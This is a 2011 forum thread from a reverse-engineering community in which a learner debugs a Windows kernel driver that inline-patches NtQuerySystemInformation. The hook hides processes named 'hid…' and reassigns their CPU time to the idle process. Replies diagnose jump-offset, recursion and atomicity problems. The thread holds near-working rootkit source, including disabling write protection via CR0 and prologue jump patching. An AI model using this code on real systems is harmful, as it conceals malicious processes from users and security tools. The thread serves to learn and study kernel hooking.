A forum for reverse engineering, OS internals and malware analysis 

Ask your beginner questions here.
 #8805  by r2nwcnydc
 Wed Sep 28, 2011 1:27 pm
lorddoskias wrote:But using just 1 function won't I find the stack in a trashed state unless I use declspec(naked)?
No, the function will act the same as the original function, it will setup and reset ebp and esp for you. Also, you call the original function with a new function call, which pushes parameters on to the stack so that the original funciton handles setting up an tearing down esp and ebp for that call.
 #8880  by lorddoskias
 Sat Oct 01, 2011 2:56 am
Then according to your line of thought the following should work:

Code: Select all
typedef NTSTATUS  (__stdcall *QUERY_SYS_INFO)(
	__in       SYSTEM_INFORMATION_CLASS SystemInformationClass,
	__inout    PVOID SystemInformation,
	__in       ULONG SystemInformationLength,
	__out_opt  PULONG ReturnLength
	);


QUERY_SYS_INFO ZwQuerySystemInformation = NULL;
QUERY_SYS_INFO myNtQuerySystemInformation = NULL;




NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING  RegistryPath)
{
//some code ommited
RtlInitUnicodeString(&FuncName, L"ZwQuerySystemInformation");
	ZwQuerySystemInformation = (QUERY_SYS_INFO)MmGetSystemRoutineAddress(&FuncName);
	myNtQuerySystemInformation = (QUERY_SYS_INFO)getRealFuncAddress((BYTE *)ZwQuerySystemInformation, KeServiceDescriptorTable.KiServiceTable);
	myNtQuerySystemInformation = (QUERY_SYS_INFO) ((PBYTE)myNtQuerySystemInformation + 2);
if( NT_SUCCESS(inlineHookInstall()) ) {
		DbgPrint("Successfully patched the function\n");
	}
//code ommited for brevity
}
Code: Select all
NTSTATUS inlineHookInstall() {
	NTSTATUS status;
	UNICODE_STRING FuncName = {0};
	DWORD dwOldCR0 = 0;
	BYTE *funcPointer = NULL; 

	//get the address we want to start overwriting
	funcPointer = getRealFuncAddress((BYTE *)ZwQuerySystemInformation, KeServiceDescriptorTable.KiServiceTable);
		
	if(!funcPointer) {
		DbgPrint("Error getting the real address of NtQuerySYsteminformation\n");
		return STATUS_UNSUCCESSFUL;
	}
		
	DbgPrint("Address of NTQUERYSYSINFO IS %p", funcPointer);
	
	dwOldCR0=__readcr0();
	__writecr0(dwOldCR0&~(1<<16));
	writeBytesToMemSafe(funcPointer);
	__writecr0(dwOldCR0);

	return STATUS_SUCCESS;
}
Code: Select all
void writeBytesToMemSafe(PVOID Addr) {
	BYTE shortJMP[] = "\xEB\xF9";
	BYTE longJMP[] = "\xE9\xDE\xAD\xBE\xEF";
	
	//now instead of 0XDEADBEEF we have the address of our routine.
	FixJMPAddress(longJMP, (BYTE *) myZwQuerySystemInformation, (BYTE *) Addr);
	//overwrite the nopsled
	RtlCopyMemory((PBYTE)Addr - 5 , longJMP, 5);

	//copy the short jump instead of mov edi, edi
	RtlCopyMemory((PBYTE) Addr, shortJMP, 2); 

	DbgPrint("Jump fixed address: %p\n", Prolog_NtQuerySys);
}

Code: Select all
NTSTATUS myZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength) 
{
	NTSTATUS ntStatus;
	PSYSTEM_PROCESS_INFORMATION currentProcInfo;
	PSYSTEM_PROCESS_INFORMATION previousProcInfo;
	BYTE *tempMath;


	ntStatus = myNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
	if(!NT_SUCCESS(ntStatus))
		return ntStatus;
//code ommitted for brevity
Basically I take the address of the NT routine from the Index of the ZwQuerySystemInfo and use that in my hook function but unfortunately this doesn't work. My code goes into some section which consists of just int 3 and nothing happens. The correct overwrites are performed but then when the code jumps to my hook function everything goes south....

Here is how my assembly looks like:
Code: Select all
nt!NtQuerySystemInformation:
0x8288A416  jmp nt!CmpDereferenceKeyControlBlockWithLock+0xb1 (8288a411) 
0x8288A418  push ebp 
0x8288A419  mov ebp,esp 
0x8288A41B  mov edx,dword ptr [ebp+8] 
0x8288A41E  cmp edx,53h 
Code: Select all
0x8288A411  jmp SSDThook!SSDThookDefaultHandler+0x3b (9469e2cb) 
Code: Select all
0x9469E2CC  int 3 
0x9469E2CD  int 3 
0x9469E2CE  int 3 
0x9469E2CF  int 3 
--- e:\drivers\development\ssdthook\ssdthook\ssdthook.cpp ----------------------
{
0x9469E2D0  mov edi,edi 
0x9469E2D2  push ebp 
0x9469E2D3  mov ebp,esp 
0x9469E2D5  sub esp,20h 
0x9469E2D8  push esi 
0x9469E2D9  push edi 
and at some point my code just keep looping at the INT3 Region o_O
 #8892  by Brock
 Sat Oct 01, 2011 9:33 am
@lorddoskias

How familiar are you with function entrypoint rewriting / hooking? Why are you calling a function "writeBytesToMemSafe"? What makes RtlCopyMemory safe? It isn't for many reasons but I understand why you are using it. Best to use atomic operations when you are able to...
 #8893  by lorddoskias
 Sat Oct 01, 2011 9:52 am
Brock wrote:@lorddoskias

How familiar are you with function entrypoint rewriting / hooking? Why are you calling a function "writeBytesToMemSafe"? What makes RtlCopyMemory safe? It isn't for many reasons but I understand why you are using it. Best to use atomic operations when you are able to...
Hi, as evident I'm learning the techniques - this is just a naming convention. And this is safe, because before rewriting it I'm doing some "tricks" such as raising the current CPU IRQL to DISPATCH and also dispatching DPCs to other cores/cpu which in a __ASM { nop; } loop. I don't know if this is the correct way to do it but it works. For me it is important to see the concept working. Unfortunately right now my rewriting happens correctly (as far as I can see in the debugger) but when my detour is used the aforementioned situation happens.


EDIT:

Okay I found the cause and fixed it - basically in the fixJMP function the offset is calculated as follows: offset = newroutine - oldroutine and not offset = newroutine - oldroutine - sizeofjmp

But now my VM is completely sluggish after the detour is installed. Any ideas why this might be the case? I don't have this when I hook the SSDT?
 #9092  by 0xC0000022L
 Tue Oct 11, 2011 8:06 pm
Raising the IRQL would work. Holding a spinlock does that implicitly, IIRC.
lorddoskias wrote:Okay I found the cause and fixed it - basically in the fixJMP function the offset is calculated as follows: offset = newroutine - oldroutine and not offset = newroutine - oldroutine - sizeofjmp

But now my VM is completely sluggish after the detour is installed. Any ideas why this might be the case? I don't have this when I hook the SSDT?
Show us the "//code ommitted for brevity" and we may be able to tell you what's wrong. It's perfectly possible that you are not playing by some rules that are to be followed in kernel mode.
 #9191  by lorddoskias
 Sun Oct 16, 2011 11:17 am
Sorry for the late response:

Here is the code which hides a process and works perfectly fine if I perform SSDT hooking, but when I do a detour it makes the whole VM very sluggish:
Code: Select all
NTSTATUS myZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength) 
{
	NTSTATUS ntStatus;
	PSYSTEM_PROCESS_INFORMATION currentProcInfo;
	PSYSTEM_PROCESS_INFORMATION previousProcInfo;
	BYTE *tempMath;


	ntStatus = myNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
	if(!NT_SUCCESS(ntStatus))
		return ntStatus;

	if(SystemInformationClass == SystemProcessorPerformanceInformation) {
		PSYSTEM_PROCESSOR_PERFORMANCE_INFORMATION timeObject;
		LONGLONG extraTime;

		timeObject = (PSYSTEM_PROCESSOR_PERFORMANCE_INFORMATION)SystemInformation;
		extraTime = timeHiddenUser.QuadPart + timeHiddenKernel.QuadPart;
		timeObject->IdleTime.QuadPart += extraTime;

	}

	if(SystemInformationClass != SystemProcessInformation) 
		return ntStatus;

	/*   FROM THIS POINT ONWARDS WE ASSUME WE ARE CALLED ABOUT PROCESSINFORMATION */

	currentProcInfo = (PSYSTEM_PROCESS_INFORMATION) SystemInformation;
	previousProcInfo = NULL;

	while (currentProcInfo != NULL)
	{
		//IF THIS IS TRUE THEN WE HAVE THE IDLE PROCESS - INJECT OUR OWN PROCESS TIME
		if(currentProcInfo->ImageName.Buffer == NULL) {
			currentProcInfo->UserTime.QuadPart += timeHiddenUser.QuadPart;
			currentProcInfo->KernelTime.QuadPart += timeHiddenKernel.QuadPart;

			timeHiddenKernel.QuadPart = 0;
			timeHiddenUser.QuadPart = 0;

		} else {

			if(memcmp(currentProcInfo->ImageName.Buffer, L"hid", 6) == 0) {
				//we have to hide this process
				//1. Get the time of this process
				timeHiddenUser.QuadPart += currentProcInfo->UserTime.QuadPart;
				timeHiddenKernel.QuadPart += currentProcInfo->KernelTime.QuadPart;

				//2. Check our position in the returned array and do pointer trickery 
				if(previousProcInfo != NULL) {

					//if current is last -> make previous last
					if(currentProcInfo->NextEntryOffset == 0) {
						previousProcInfo->NextEntryOffset = 0;

						//if we are somewhere in the middle - skip us
					} else {
						//might be wrong
						previousProcInfo->NextEntryOffset = previousProcInfo->NextEntryOffset + currentProcInfo->NextEntryOffset;

					}
				} else {
					//we are the first and only.
					if(currentProcInfo->NextEntryOffset == 0) {
						SystemInformation = NULL;
						//we are the first of many
					} else {
						tempMath = (BYTE *)SystemInformation + currentProcInfo->NextEntryOffset;
						SystemInformation  = (PSYSTEM_PROCESS_INFORMATION)tempMath;
						tempMath = NULL;
					}
				}

				DbgPrint("Process Hidden\n");
			}
		}

		previousProcInfo = currentProcInfo;
		if(currentProcInfo->NextEntryOffset == 0) {
			currentProcInfo = NULL;
		} else {
			tempMath = (BYTE *)currentProcInfo + currentProcInfo->NextEntryOffset;
			currentProcInfo = (PSYSTEM_PROCESS_INFORMATION)tempMath;
			tempMath = NULL;
		}
	}


	return ntStatus;
}
 #9212  by 0xC0000022L
 Mon Oct 17, 2011 3:32 pm
lorddoskias wrote:Here is the code which hides a process and works perfectly fine if I perform SSDT hooking, but when I do a detour it makes the whole VM very sluggish
Okay, here's what looks odd to me:

myZwQuerySystemInformation is apparently your replacement function (right?), but inside it you call myNtQuerySystemInformation instead of the real ZwQuerySystemInformation ... what about that? How does that myNtQuerySystemInformation look? Are you certain you don't end up in some kind of recursion here?

Also, where do you store timeHiddenUser and timeHiddenKernel? Are those part of the driver extension or static data inside your code?
 #9217  by lorddoskias
 Mon Oct 17, 2011 6:19 pm
First of all I'd like to thank you that you are actually taking the time to answer. Much appreciated.

Now, onto your question - timeHidden is a global variable defined in my .c file. You've guessed correctly that myZwQuerySysinfo is the replacement function, in it I call myNtQuerySysInfo because this is actually the addres of the _REAL_ NtQuery function. This is a case of shitty naming I'd say :). Here is the code:
Code: Select all
	
myNtQuerySystemInformation = (QUERY_SYS_INFO)getRealFuncAddress((BYTE *)ZwQuerySystemInformation, KeServiceDescriptorTable.KiServiceTable);
myNtQuerySystemInformation = (QUERY_SYS_INFO) ((PBYTE)myNtQuerySystemInformation + 2);
As you can see I correctly point it to 2 bytes after the beginning because at the original 2 bytes I have the short jump. What I can't understand is why this might be working when I do a SSDT hooking but when I do inline patching it doesn't? Also if you feel like it I'm willing to send you my source files so that you can compile and run them and see if you are experiencing the same problem.
 #9221  by 0xC0000022L
 Mon Oct 17, 2011 9:40 pm
lorddoskias wrote:As you can see I correctly point it to 2 bytes after the beginning because at the original 2 bytes I have the short jump. What I can't understand is why this might be working when I do a SSDT hooking but when I do inline patching it doesn't? Also if you feel like it I'm willing to send you my source files so that you can compile and run them and see if you are experiencing the same problem.
Well, as I understand you it works, but messes up something timing related (sluggish VM).

OK, help me getting the facts straight here:
  1. you don't do SSDT hooking at the moment?
  2. you patch inline by overwriting some opcode (which?) at the beginning of the function to short-jump into the previously patched long jump that is located at function-address minus 5, right (because 5 is the size of the long jump)?
  3. you got the calculation of the jump address right, so you don't end up in the CC-area (int3)?
At this point you seem to be doing almost everything right that we can see. So unless it's something subtle I'm missing, let's rule out other possible causes. Can you simply replace your whole myZwQuerySystemInformation routine with this one:
Code: Select all
NTSTATUS myZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength) 
{
   return myNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
}
Once built and run, does this still cause the same slowdown you have previously encountered?

Oh, and could you show us a byte dump (WinDbg) of the memory around (i.e. also a bit before) the patched function, so we can see what's going on there?!
 #9228  by newgre
 Tue Oct 18, 2011 8:33 am
If I understood correctly, he patches a near jump at the beginning of NtQuerysystemInformation. It only takes two bytes and would overwrite the usual
Code: Select all
mov edi, edi
code sequence (the code sequence exists for that very reason). Also, he can't land in an CC-area otherwise he would see exceptions / blues screen.
Btw, the code to install the hook is inherently unsafe: what if you write the patch while some function is executing the entry point? Patching the near jump should be made atomic. Have you tried single-stepping through your hook?